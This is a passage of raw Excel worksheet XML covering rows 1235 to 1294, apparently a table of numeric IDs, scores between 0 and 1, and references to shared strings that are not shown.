      <c r="E1235">
        <v>0.48710000514984131</v>
      </c>
      <c r="F1235" t="s">
        <v>7</v>
      </c>
      <c r="G1235" t="s">
        <v>2438</v>
      </c>
      <c r="H1235" t="s">
        <v>2439</v>
      </c>
    </row>
    <row r="1236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1236" s="1">
        <v>1234</v>
      </c>
      <c r="B1236">
        <v>2840</v>
      </c>
      <c r="C1236">
        <v>2840</v>
      </c>
      <c r="D1236">
        <v>0</v>
      </c>
      <c r="E1236">
        <v>0.57309997081756592</v>
      </c>
      <c r="F1236" t="s">
        <v>7</v>
      </c>
      <c r="G1236" t="s">
        <v>2440</v>
      </c>
      <c r="H1236" t="s">
        <v>2441</v>
      </c>
    </row>
    <row r="1237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1237" s="1">
        <v>1235</v>
      </c>
      <c r="B1237">
        <v>2805</v>
      </c>
      <c r="C1237">
        <v>2805</v>
      </c>
      <c r="D1237">
        <v>0</v>
      </c>
      <c r="E1237">
        <v>0.82829999923706055</v>
      </c>
      <c r="F1237" t="s">
        <v>7</v>
      </c>
      <c r="G1237" t="s">
        <v>2442</v>
      </c>
      <c r="H1237" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="1238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1238" s="1">
        <v>1236</v>
      </c>
      <c r="B1238">
        <v>2809</v>
      </c>
      <c r="C1238">
        <v>2809</v>
      </c>
      <c r="D1238">
        <v>0</v>
      </c>
      <c r="E1238">
        <v>0.65140002965927124</v>
      </c>
      <c r="F1238" t="s">
        <v>7</v>
      </c>
      <c r="G1238" t="s">
        <v>2444</v>
      </c>
      <c r="H1238" t="s">
        <v>2445</v>
      </c>
    </row>
    <row r="1239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1239" s="1">
        <v>1237</v>
      </c>
      <c r="B1239">
        <v>2810</v>
      </c>
      <c r="C1239">
        <v>2810</v>
      </c>
      <c r="D1239">
        <v>0</v>
      </c>
      <c r="E1239">
        <v>0.70099997520446777</v>
      </c>
      <c r="F1239" t="s">
        <v>7</v>
      </c>
      <c r="G1239" t="s">
        <v>2446</v>
      </c>
      <c r="H1239" t="s">
        <v>2447</v>
      </c>
    </row>
    <row r="1240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1240" s="1">
        <v>1238</v>
      </c>
      <c r="B1240">
        <v>2811</v>
      </c>
      <c r="C1240">
        <v>2811</v>
      </c>
      <c r="D1240">
        <v>0</v>
      </c>
      <c r="E1240">
        <v>0.41029998660087591</v>
      </c>
      <c r="F1240" t="s">
        <v>7</v>
      </c>
      <c r="G1240" t="s">
        <v>2448</v>
      </c>
      <c r="H1240" t="s">
        <v>2449</v>
      </c>
    </row>
    <row r="1241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1241" s="1">
        <v>1239</v>
      </c>
      <c r="B1241">
        <v>6214</v>
      </c>
      <c r="C1241">
        <v>6214</v>
      </c>
      <c r="D1241">
        <v>0</v>
      </c>
      <c r="E1241">
        <v>0.92699998617172241</v>
      </c>
      <c r="F1241" t="s">
        <v>7</v>
      </c>
      <c r="G1241" t="s">
        <v>2450</v>
      </c>
      <c r="H1241" t="s">
        <v>2451</v>
      </c>
    </row>
    <row r="1242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1242" s="1">
        <v>1240</v>
      </c>
      <c r="B1242">
        <v>2814</v>
      </c>
      <c r="C1242">
        <v>2814</v>
      </c>
      <c r="D1242">
        <v>0</v>
      </c>
      <c r="E1242">
        <v>0.99379998445510864</v>
      </c>
      <c r="F1242" t="s">
        <v>7</v>
      </c>
      <c r="G1242" t="s">
        <v>2452</v>
      </c>
      <c r="H1242" t="s">
        <v>2453</v>
      </c>
    </row>
    <row r="1243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1243" s="1">
        <v>1241</v>
      </c>
      <c r="B1243">
        <v>4058</v>
      </c>
      <c r="C1243">
        <v>4058</v>
      </c>
      <c r="D1243">
        <v>0</v>
      </c>
      <c r="E1243">
        <v>0.99559998512268066</v>
      </c>
      <c r="F1243" t="s">
        <v>7</v>
      </c>
      <c r="G1243" t="s">
        <v>2454</v>
      </c>
      <c r="H1243" t="s">
        <v>2455</v>
      </c>
    </row>
    <row r="1244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1244" s="1">
        <v>1242</v>
      </c>
      <c r="B1244">
        <v>6227</v>
      </c>
      <c r="C1244">
        <v>6227</v>
      </c>
      <c r="D1244">
        <v>0</v>
      </c>
      <c r="E1244">
        <v>0.80809998512268066</v>
      </c>
      <c r="F1244" t="s">
        <v>7</v>
      </c>
      <c r="G1244" t="s">
        <v>2456</v>
      </c>
      <c r="H1244" t="s">
        <v>2457</v>
      </c>
    </row>
    <row r="1245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1245" s="1">
        <v>1243</v>
      </c>
      <c r="B1245">
        <v>2819</v>
      </c>
      <c r="C1245">
        <v>2819</v>
      </c>
      <c r="D1245">
        <v>0</v>
      </c>
      <c r="E1245">
        <v>0.36820000410079962</v>
      </c>
      <c r="F1245" t="s">
        <v>7</v>
      </c>
      <c r="G1245" t="s">
        <v>2458</v>
      </c>
      <c r="H1245" t="s">
        <v>2459</v>
      </c>
    </row>
    <row r="1246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1246" s="1">
        <v>1244</v>
      </c>
      <c r="B1246">
        <v>6224</v>
      </c>
      <c r="C1246">
        <v>6224</v>
      </c>
      <c r="D1246">
        <v>0</v>
      </c>
      <c r="E1246">
        <v>0.80099999904632568</v>
      </c>
      <c r="F1246" t="s">
        <v>7</v>
      </c>
      <c r="G1246" t="s">
        <v>2460</v>
      </c>
      <c r="H1246" t="s">
        <v>2461</v>
      </c>
    </row>
    <row r="1247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1247" s="1">
        <v>1245</v>
      </c>
      <c r="B1247">
        <v>6225</v>
      </c>
      <c r="C1247">
        <v>6225</v>
      </c>
      <c r="D1247">
        <v>0</v>
      </c>
      <c r="E1247">
        <v>0.8475000262260437</v>
      </c>
      <c r="F1247" t="s">
        <v>7</v>
      </c>
      <c r="G1247" t="s">
        <v>2462</v>
      </c>
      <c r="H1247" t="s">
        <v>2463</v>
      </c>
    </row>
    <row r="1248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1248" s="1">
        <v>1246</v>
      </c>
      <c r="B1248">
        <v>2830</v>
      </c>
      <c r="C1248">
        <v>2830</v>
      </c>
      <c r="D1248">
        <v>0</v>
      </c>
      <c r="E1248">
        <v>0.45300000905990601</v>
      </c>
      <c r="F1248" t="s">
        <v>7</v>
      </c>
      <c r="G1248" t="s">
        <v>2464</v>
      </c>
      <c r="H1248" t="s">
        <v>2465</v>
      </c>
    </row>
    <row r="1249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1249" s="1">
        <v>1247</v>
      </c>
      <c r="B1249">
        <v>4045</v>
      </c>
      <c r="C1249">
        <v>4045</v>
      </c>
      <c r="D1249">
        <v>0</v>
      </c>
      <c r="E1249">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1249" t="s">
        <v>7</v>
      </c>
      <c r="G1249" t="s">
        <v>2466</v>
      </c>
      <c r="H1249" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="1250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1250" s="1">
        <v>1248</v>
      </c>
      <c r="B1250">
        <v>2835</v>
      </c>
      <c r="C1250">
        <v>2835</v>
      </c>
      <c r="D1250">
        <v>0</v>
      </c>
      <c r="E1250">
        <v>0.62629997730255127</v>
      </c>
      <c r="F1250" t="s">
        <v>7</v>
      </c>
      <c r="G1250" t="s">
        <v>2467</v>
      </c>
      <c r="H1250" t="s">
        <v>2468</v>
      </c>
    </row>
    <row r="1251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1251" s="1">
        <v>1249</v>
      </c>
      <c r="B1251">
        <v>2838</v>
      </c>
      <c r="C1251">
        <v>2838</v>
      </c>
      <c r="D1251">
        <v>0</v>
      </c>
      <c r="E1251">
        <v>0.55970001220703125</v>
      </c>
      <c r="F1251" t="s">
        <v>7</v>
      </c>
      <c r="G1251" t="s">
        <v>2469</v>
      </c>
      <c r="H1251" t="s">
        <v>2470</v>
      </c>
    </row>
    <row r="1252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1252" s="1">
        <v>1250</v>
      </c>
      <c r="B1252">
        <v>2839</v>
      </c>
      <c r="C1252">
        <v>2839</v>
      </c>
      <c r="D1252">
        <v>0</v>
      </c>
      <c r="E1252">
        <v>0.95480000972747803</v>
      </c>
      <c r="F1252" t="s">
        <v>7</v>
      </c>
      <c r="G1252" t="s">
        <v>2471</v>
      </c>
      <c r="H1252" t="s">
        <v>2472</v>
      </c>
    </row>
    <row r="1253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1253" s="1">
        <v>1251</v>
      </c>
      <c r="B1253">
        <v>4057</v>
      </c>
      <c r="C1253">
        <v>4057</v>
      </c>
      <c r="D1253">
        <v>0</v>
      </c>
      <c r="E1253">
        <v>0.57130002975463867</v>
      </c>
      <c r="F1253" t="s">
        <v>7</v>
      </c>
      <c r="G1253" t="s">
        <v>2473</v>
      </c>
      <c r="H1253" t="s">
        <v>2474</v>
      </c>
    </row>
    <row r="1254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1254" s="1">
        <v>1252</v>
      </c>
      <c r="B1254">
        <v>4011</v>
      </c>
      <c r="C1254">
        <v>4011</v>
      </c>
      <c r="D1254">
        <v>0</v>
      </c>
      <c r="E1254">
        <v>0.99830001592636108</v>
      </c>
      <c r="F1254" t="s">
        <v>7</v>
      </c>
      <c r="G1254" t="s">
        <v>2475</v>
      </c>
      <c r="H1254" t="s">
        <v>2476</v>
      </c>
    </row>
    <row r="1255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1255" s="1">
        <v>1253</v>
      </c>
      <c r="B1255">
        <v>2898</v>
      </c>
      <c r="C1255">
        <v>2898</v>
      </c>
      <c r="D1255">
        <v>0</v>
      </c>
      <c r="E1255">
        <v>0.95870000123977661</v>
      </c>
      <c r="F1255" t="s">
        <v>7</v>
      </c>
      <c r="G1255" t="s">
        <v>2477</v>
      </c>
      <c r="H1255" t="s">
        <v>2478</v>
      </c>
    </row>
    <row r="1256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1256" s="1">
        <v>1254</v>
      </c>
      <c r="B1256">
        <v>6240</v>
      </c>
      <c r="C1256">
        <v>6240</v>
      </c>
      <c r="D1256">
        <v>0</v>
      </c>
      <c r="E1256">
        <v>0.9901999831199646</v>
      </c>
      <c r="F1256" t="s">
        <v>7</v>
      </c>
      <c r="G1256" t="s">
        <v>2479</v>
      </c>
      <c r="H1256" t="s">
        <v>2480</v>
      </c>
    </row>
    <row r="1257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1257" s="1">
        <v>1255</v>
      </c>
      <c r="B1257">
        <v>6628</v>
      </c>
      <c r="C1257">
        <v>6628</v>
      </c>
      <c r="D1257">
        <v>0</v>
      </c>
      <c r="E1257">
        <v>0.94580000638961792</v>
      </c>
      <c r="F1257" t="s">
        <v>7</v>
      </c>
      <c r="G1257" t="s">
        <v>2481</v>
      </c>
      <c r="H1257" t="s">
        <v>2482</v>
      </c>
    </row>
    <row r="1258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1258" s="1">
        <v>1256</v>
      </c>
      <c r="B1258">
        <v>2944</v>
      </c>
      <c r="C1258">
        <v>2944</v>
      </c>
      <c r="D1258">
        <v>0</v>
      </c>
      <c r="E1258">
        <v>0.78570002317428589</v>
      </c>
      <c r="F1258" t="s">
        <v>7</v>
      </c>
      <c r="G1258" t="s">
        <v>2483</v>
      </c>
      <c r="H1258" t="s">
        <v>2484</v>
      </c>
    </row>
    <row r="1259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1259" s="1">
        <v>1257</v>
      </c>
      <c r="B1259">
        <v>3981</v>
      </c>
      <c r="C1259">
        <v>3981</v>
      </c>
      <c r="D1259">
        <v>0</v>
      </c>
      <c r="E1259">
        <v>0.72229999303817749</v>
      </c>
      <c r="F1259" t="s">
        <v>7</v>
      </c>
      <c r="G1259" t="s">
        <v>2485</v>
      </c>
      <c r="H1259" t="s">
        <v>2486</v>
      </c>
    </row>
    <row r="1260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1260" s="1">
        <v>1258</v>
      </c>
      <c r="B1260">
        <v>6627</v>
      </c>
      <c r="C1260">
        <v>6627</v>
      </c>
      <c r="D1260">
        <v>0</v>
      </c>
      <c r="E1260">
        <v>0.99690002202987671</v>
      </c>
      <c r="F1260" t="s">
        <v>7</v>
      </c>
      <c r="G1260" t="s">
        <v>2487</v>
      </c>
      <c r="H1260" t="s">
        <v>2488</v>
      </c>
    </row>
    <row r="1261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1261" s="1">
        <v>1259</v>
      </c>
      <c r="B1261">
        <v>2948</v>
      </c>
      <c r="C1261">
        <v>2948</v>
      </c>
      <c r="D1261">
        <v>0</v>
      </c>
      <c r="E1261">
        <v>0.69569998979568481</v>
      </c>
      <c r="F1261" t="s">
        <v>7</v>
      </c>
      <c r="G1261" t="s">
        <v>2489</v>
      </c>
      <c r="H1261" t="s">
        <v>2490</v>
      </c>
    </row>
    <row r="1262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1262" s="1">
        <v>1260</v>
      </c>
      <c r="B1262">
        <v>2949</v>
      </c>
      <c r="C1262">
        <v>2949</v>
      </c>
      <c r="D1262">
        <v>0</v>
      </c>
      <c r="E1262">
        <v>0.86430001258850098</v>
      </c>
      <c r="F1262" t="s">
        <v>7</v>
      </c>
      <c r="G1262" t="s">
        <v>2491</v>
      </c>
      <c r="H1262" t="s">
        <v>2492</v>
      </c>
    </row>
    <row r="1263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1263" s="1">
        <v>1261</v>
      </c>
      <c r="B1263">
        <v>6623</v>
      </c>
      <c r="C1263">
        <v>6623</v>
      </c>
      <c r="D1263">
        <v>0</v>
      </c>
      <c r="E1263">
        <v>0.68660002946853638</v>
      </c>
      <c r="F1263" t="s">
        <v>7</v>
      </c>
      <c r="G1263" t="s">
        <v>2493</v>
      </c>
      <c r="H1263" t="s">
        <v>2494</v>
      </c>
    </row>
    <row r="1264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1264" s="1">
        <v>1262</v>
      </c>
      <c r="B1264">
        <v>3982</v>
      </c>
      <c r="C1264">
        <v>3982</v>
      </c>
      <c r="D1264">
        <v>0</v>
      </c>
      <c r="E1264">
        <v>0.99830001592636108</v>
      </c>
      <c r="F1264" t="s">
        <v>7</v>
      </c>
      <c r="G1264" t="s">
        <v>2495</v>
      </c>
      <c r="H1264" t="s">
        <v>2496</v>
      </c>
    </row>
    <row r="1265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1265" s="1">
        <v>1263</v>
      </c>
      <c r="B1265">
        <v>2951</v>
      </c>
      <c r="C1265">
        <v>2951</v>
      </c>
      <c r="D1265">
        <v>0</v>
      </c>
      <c r="E1265">
        <v>0.88669997453689575</v>
      </c>
      <c r="F1265" t="s">
        <v>7</v>
      </c>
      <c r="G1265" t="s">
        <v>2497</v>
      </c>
      <c r="H1265" t="s">
        <v>2498</v>
      </c>
    </row>
    <row r="1266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1266" s="1">
        <v>1264</v>
      </c>
      <c r="B1266">
        <v>6614</v>
      </c>
      <c r="C1266">
        <v>6614</v>
      </c>
      <c r="D1266">
        <v>0</v>
      </c>
      <c r="E1266">
        <v>0.74839997291564941</v>
      </c>
      <c r="F1266" t="s">
        <v>7</v>
      </c>
      <c r="G1266" t="s">
        <v>2499</v>
      </c>
      <c r="H1266" t="s">
        <v>2500</v>
      </c>
    </row>
    <row r="1267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1267" s="1">
        <v>1265</v>
      </c>
      <c r="B1267">
        <v>2956</v>
      </c>
      <c r="C1267">
        <v>2956</v>
      </c>
      <c r="D1267">
        <v>0</v>
      </c>
      <c r="E1267">
        <v>0.58389997482299805</v>
      </c>
      <c r="F1267" t="s">
        <v>7</v>
      </c>
      <c r="G1267" t="s">
        <v>2501</v>
      </c>
      <c r="H1267" t="s">
        <v>2502</v>
      </c>
    </row>
    <row r="1268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1268" s="1">
        <v>1266</v>
      </c>
      <c r="B1268">
        <v>6605</v>
      </c>
      <c r="C1268">
        <v>6605</v>
      </c>
      <c r="D1268">
        <v>0</v>
      </c>
      <c r="E1268">
        <v>0.50410002470016479</v>
      </c>
      <c r="F1268" t="s">
        <v>7</v>
      </c>
      <c r="G1268" t="s">
        <v>2503</v>
      </c>
      <c r="H1268" t="s">
        <v>2504</v>
      </c>
    </row>
    <row r="1269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1269" s="1">
        <v>1267</v>
      </c>
      <c r="B1269">
        <v>2958</v>
      </c>
      <c r="C1269">
        <v>2958</v>
      </c>
      <c r="D1269">
        <v>0</v>
      </c>
      <c r="E1269">
        <v>0.83090001344680786</v>
      </c>
      <c r="F1269" t="s">
        <v>7</v>
      </c>
      <c r="G1269" t="s">
        <v>2505</v>
      </c>
      <c r="H1269" t="s">
        <v>2506</v>
      </c>
    </row>
    <row r="1270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1270" s="1">
        <v>1268</v>
      </c>
      <c r="B1270">
        <v>6604</v>
      </c>
      <c r="C1270">
        <v>6604</v>
      </c>
      <c r="D1270">
        <v>0</v>
      </c>
      <c r="E1270">
        <v>0.57249999046325684</v>
      </c>
      <c r="F1270" t="s">
        <v>7</v>
      </c>
      <c r="G1270" t="s">
        <v>2507</v>
      </c>
      <c r="H1270" t="s">
        <v>2508</v>
      </c>
    </row>
    <row r="1271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1271" s="1">
        <v>1269</v>
      </c>
      <c r="B1271">
        <v>3977</v>
      </c>
      <c r="C1271">
        <v>3977</v>
      </c>
      <c r="D1271">
        <v>0</v>
      </c>
      <c r="E1271">
        <v>0.81889998912811279</v>
      </c>
      <c r="F1271" t="s">
        <v>7</v>
      </c>
      <c r="G1271" t="s">
        <v>2509</v>
      </c>
      <c r="H1271" t="s">
        <v>2510</v>
      </c>
    </row>
    <row r="1272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1272" s="1">
        <v>1270</v>
      </c>
      <c r="B1272">
        <v>2963</v>
      </c>
      <c r="C1272">
        <v>2963</v>
      </c>
      <c r="D1272">
        <v>0</v>
      </c>
      <c r="E1272">
        <v>0.99610000848770142</v>
      </c>
      <c r="F1272" t="s">
        <v>7</v>
      </c>
      <c r="G1272" t="s">
        <v>2511</v>
      </c>
      <c r="H1272" t="s">
        <v>2512</v>
      </c>
    </row>
    <row r="1273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1273" s="1">
        <v>1271</v>
      </c>
      <c r="B1273">
        <v>2953</v>
      </c>
      <c r="C1273">
        <v>2953</v>
      </c>
      <c r="D1273">
        <v>0</v>
      </c>
      <c r="E1273">
        <v>0.60909998416900635</v>
      </c>
      <c r="F1273" t="s">
        <v>7</v>
      </c>
      <c r="G1273" t="s">
        <v>2513</v>
      </c>
      <c r="H1273" t="s">
        <v>2514</v>
      </c>
    </row>
    <row r="1274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1274" s="1">
        <v>1272</v>
      </c>
      <c r="B1274">
        <v>2941</v>
      </c>
      <c r="C1274">
        <v>2941</v>
      </c>
      <c r="D1274">
        <v>0</v>
      </c>
      <c r="E1274">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1274" t="s">
        <v>7</v>
      </c>
      <c r="G1274" t="s">
        <v>2515</v>
      </c>
      <c r="H1274" t="s">
        <v>2516</v>
      </c>
    </row>
    <row r="1275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1275" s="1">
        <v>1273</v>
      </c>
      <c r="B1275">
        <v>6629</v>
      </c>
      <c r="C1275">
        <v>6629</v>
      </c>
      <c r="D1275">
        <v>0</v>
      </c>
      <c r="E1275">
        <v>0.99559998512268066</v>
      </c>
      <c r="F1275" t="s">
        <v>7</v>
      </c>
      <c r="G1275" t="s">
        <v>2517</v>
      </c>
      <c r="H1275" t="s">
        <v>2518</v>
      </c>
    </row>
    <row r="1276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1276" s="1">
        <v>1274</v>
      </c>
      <c r="B1276">
        <v>6247</v>
      </c>
      <c r="C1276">
        <v>6247</v>
      </c>
      <c r="D1276">
        <v>0</v>
      </c>
      <c r="E1276">
        <v>0.53659999370574951</v>
      </c>
      <c r="F1276" t="s">
        <v>7</v>
      </c>
      <c r="G1276" t="s">
        <v>2519</v>
      </c>
      <c r="H1276" t="s">
        <v>2520</v>
      </c>
    </row>
    <row r="1277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1277" s="1">
        <v>1275</v>
      </c>
      <c r="B1277">
        <v>6242</v>
      </c>
      <c r="C1277">
        <v>6242</v>
      </c>
      <c r="D1277">
        <v>0</v>
      </c>
      <c r="E1277">
        <v>0.93919998407363892</v>
      </c>
      <c r="F1277" t="s">
        <v>7</v>
      </c>
      <c r="G1277" t="s">
        <v>2521</v>
      </c>
      <c r="H1277" t="s">
        <v>2522</v>
      </c>
    </row>
    <row r="1278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1278" s="1">
        <v>1276</v>
      </c>
      <c r="B1278">
        <v>2907</v>
      </c>
      <c r="C1278">
        <v>2907</v>
      </c>
      <c r="D1278">
        <v>0</v>
      </c>
      <c r="E1278">
        <v>0.88669997453689575</v>
      </c>
      <c r="F1278" t="s">
        <v>7</v>
      </c>
      <c r="G1278" t="s">
        <v>2523</v>
      </c>
      <c r="H1278" t="s">
        <v>2524</v>
      </c>
    </row>
    <row r="1279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1279" s="1">
        <v>1277</v>
      </c>
      <c r="B1279">
        <v>2909</v>
      </c>
      <c r="C1279">
        <v>2909</v>
      </c>
      <c r="D1279">
        <v>0</v>
      </c>
      <c r="E1279">
        <v>0.9035000205039978</v>
      </c>
      <c r="F1279" t="s">
        <v>7</v>
      </c>
      <c r="G1279" t="s">
        <v>2525</v>
      </c>
      <c r="H1279" t="s">
        <v>2526</v>
      </c>
    </row>
    <row r="1280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1280" s="1">
        <v>1278</v>
      </c>
      <c r="B1280">
        <v>3998</v>
      </c>
      <c r="C1280">
        <v>3998</v>
      </c>
      <c r="D1280">
        <v>0</v>
      </c>
      <c r="E1280">
        <v>0.7531999945640564</v>
      </c>
      <c r="F1280" t="s">
        <v>7</v>
      </c>
      <c r="G1280" t="s">
        <v>2527</v>
      </c>
      <c r="H1280" t="s">
        <v>2528</v>
      </c>
    </row>
    <row r="1281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1281" s="1">
        <v>1279</v>
      </c>
      <c r="B1281">
        <v>2911</v>
      </c>
      <c r="C1281">
        <v>2911</v>
      </c>
      <c r="D1281">
        <v>0</v>
      </c>
      <c r="E1281">
        <v>0.99459999799728394</v>
      </c>
      <c r="F1281" t="s">
        <v>7</v>
      </c>
      <c r="G1281" t="s">
        <v>2529</v>
      </c>
      <c r="H1281" t="s">
        <v>2530</v>
      </c>
    </row>
    <row r="1282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1282" s="1">
        <v>1280</v>
      </c>
      <c r="B1282">
        <v>2913</v>
      </c>
      <c r="C1282">
        <v>2913</v>
      </c>
      <c r="D1282">
        <v>0</v>
      </c>
      <c r="E1282">
        <v>0.68819999694824219</v>
      </c>
      <c r="F1282" t="s">
        <v>7</v>
      </c>
      <c r="G1282" t="s">
        <v>2531</v>
      </c>
      <c r="H1282" t="s">
        <v>2532</v>
      </c>
    </row>
    <row r="1283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1283" s="1">
        <v>1281</v>
      </c>
      <c r="B1283">
        <v>6638</v>
      </c>
      <c r="C1283">
        <v>6638</v>
      </c>
      <c r="D1283">
        <v>0</v>
      </c>
      <c r="E1283">
        <v>0.98860001564025879</v>
      </c>
      <c r="F1283" t="s">
        <v>7</v>
      </c>
      <c r="G1283" t="s">
        <v>2533</v>
      </c>
      <c r="H1283" t="s">
        <v>2534</v>
      </c>
    </row>
    <row r="1284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1284" s="1">
        <v>1282</v>
      </c>
      <c r="B1284">
        <v>3997</v>
      </c>
      <c r="C1284">
        <v>3997</v>
      </c>
      <c r="D1284">
        <v>0</v>
      </c>
      <c r="E1284">
        <v>0.74029999971389771</v>
      </c>
      <c r="F1284" t="s">
        <v>7</v>
      </c>
      <c r="G1284" t="s">
        <v>2535</v>
      </c>
      <c r="H1284" t="s">
        <v>2536</v>
      </c>
    </row>
    <row r="1285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1285" s="1">
        <v>1283</v>
      </c>
      <c r="B1285">
        <v>2916</v>
      </c>
      <c r="C1285">
        <v>2916</v>
      </c>
      <c r="D1285">
        <v>0</v>
      </c>
      <c r="E1285">
        <v>0.84479999542236328</v>
      </c>
      <c r="F1285" t="s">
        <v>7</v>
      </c>
      <c r="G1285" t="s">
        <v>2537</v>
      </c>
      <c r="H1285" t="s">
        <v>2538</v>
      </c>
    </row>
    <row r="1286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1286" s="1">
        <v>1284</v>
      </c>
      <c r="B1286">
        <v>2917</v>
      </c>
      <c r="C1286">
        <v>2917</v>
      </c>
      <c r="D1286">
        <v>0</v>
      </c>
      <c r="E1286">
        <v>0.81319999694824219</v>
      </c>
      <c r="F1286" t="s">
        <v>7</v>
      </c>
      <c r="G1286" t="s">
        <v>2539</v>
      </c>
      <c r="H1286" t="s">
        <v>2540</v>
      </c>
    </row>
    <row r="1287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1287" s="1">
        <v>1285</v>
      </c>
      <c r="B1287">
        <v>3996</v>
      </c>
      <c r="C1287">
        <v>3996</v>
      </c>
      <c r="D1287">
        <v>0</v>
      </c>
      <c r="E1287">
        <v>0.49930000305175781</v>
      </c>
      <c r="F1287" t="s">
        <v>7</v>
      </c>
      <c r="G1287" t="s">
        <v>2541</v>
      </c>
      <c r="H1287" t="s">
        <v>2542</v>
      </c>
    </row>
    <row r="1288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1288" s="1">
        <v>1286</v>
      </c>
      <c r="B1288">
        <v>3994</v>
      </c>
      <c r="C1288">
        <v>3994</v>
      </c>
      <c r="D1288">
        <v>0</v>
      </c>
      <c r="E1288">
        <v>0.7896999716758728</v>
      </c>
      <c r="F1288" t="s">
        <v>7</v>
      </c>
      <c r="G1288" t="s">
        <v>2543</v>
      </c>
      <c r="H1288" t="s">
        <v>2544</v>
      </c>
    </row>
    <row r="1289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1289" s="1">
        <v>1287</v>
      </c>
      <c r="B1289">
        <v>6634</v>
      </c>
      <c r="C1289">
        <v>6634</v>
      </c>
      <c r="D1289">
        <v>0</v>
      </c>
      <c r="E1289">
        <v>0.99029999971389771</v>
      </c>
      <c r="F1289" t="s">
        <v>7</v>
      </c>
      <c r="G1289" t="s">
        <v>2545</v>
      </c>
      <c r="H1289" t="s">
        <v>2546</v>
      </c>
    </row>
    <row r="1290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1290" s="1">
        <v>1288</v>
      </c>
      <c r="B1290">
        <v>3991</v>
      </c>
      <c r="C1290">
        <v>3991</v>
      </c>
      <c r="D1290">
        <v>0</v>
      </c>
      <c r="E1290">
        <v>0.91299998760223389</v>
      </c>
      <c r="F1290" t="s">
        <v>7</v>
      </c>
      <c r="G1290" t="s">
        <v>2547</v>
      </c>
      <c r="H1290" t="s">
        <v>2548</v>
      </c>
    </row>
    <row r="1291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1291" s="1">
        <v>1289</v>
      </c>
      <c r="B1291">
        <v>2931</v>
      </c>
      <c r="C1291">
        <v>2931</v>
      </c>
      <c r="D1291">
        <v>0</v>
      </c>
      <c r="E1291">
        <v>0.7281000018119812</v>
      </c>
      <c r="F1291" t="s">
        <v>7</v>
      </c>
      <c r="G1291" t="s">
        <v>2549</v>
      </c>
      <c r="H1291" t="s">
        <v>2550</v>
      </c>
    </row>
    <row r="1292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1292" s="1">
        <v>1290</v>
      </c>
      <c r="B1292">
        <v>2936</v>
      </c>
      <c r="C1292">
        <v>2936</v>
      </c>
      <c r="D1292">
        <v>0</v>
      </c>
      <c r="E1292">
        <v>0.49889999628067022</v>
      </c>
      <c r="F1292" t="s">
        <v>7</v>
      </c>
      <c r="G1292" t="s">
        <v>2551</v>
      </c>
      <c r="H1292" t="s">
        <v>2552</v>
      </c>
    </row>
    <row r="1293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1293" s="1">
        <v>1291</v>
      </c>
      <c r="B1293">
        <v>2937</v>
      </c>
      <c r="C1293">
        <v>2937</v>
      </c>
      <c r="D1293">
        <v>0</v>
      </c>
      <c r="E1293">
        <v>0.63889998197555542</v>
      </c>
      <c r="F1293" t="s">
        <v>7</v>
      </c>
      <c r="G1293" t="s">
        <v>2553</v>
      </c>
      <c r="H1293" t="s">
        <v>2554</v>
      </c>
    </row>
    <row r="1294" spans="1:8" x14ac:dyDescent="0.45">
